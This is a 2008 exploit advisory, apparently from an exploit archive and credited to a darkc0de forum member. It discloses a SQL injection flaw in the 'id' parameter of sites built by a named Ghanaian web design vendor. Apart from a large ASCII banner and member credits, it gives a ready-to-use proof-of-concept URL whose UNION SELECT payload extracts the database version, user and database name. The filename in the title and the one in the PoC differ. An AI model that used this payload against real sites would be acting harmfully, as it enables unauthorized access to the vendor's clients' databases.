Home / exploits web4ughana-sql.txt
Posted on 15 September 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # d3hydr8 - rsauron - baltazar - sinner_01 - r45c4l - beenu # # # # And all darkc0de.com members # # # ################################################################ # # Author: P47r1ck # # Home : www.darkc0de.com # # Email : P47r1ckro[at]gmail[dot]com # # Share the c0de! # ################################################################ # # Title: Designed and Powered by Web4UGhana.com (page.php?id=) SQL Injection Vulnerabilities # Vendor: http://www.Web4UGhana.com & http://www.swcghana.com/ # Vendor's Portfolio: http://www.swcghana.com/portfolio.php # ################################################################ # # d0rk: N/A # # ################################################################ # # Vulnerabilities # # SQL Injection in "page.php" in the "id=" parameter. # # # PoC : # http://www.site.com/pages.php?id=3+and+1=2+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3-- # # ################################################################ # # Bug discovered : 15 Sep.2008 ################################################################
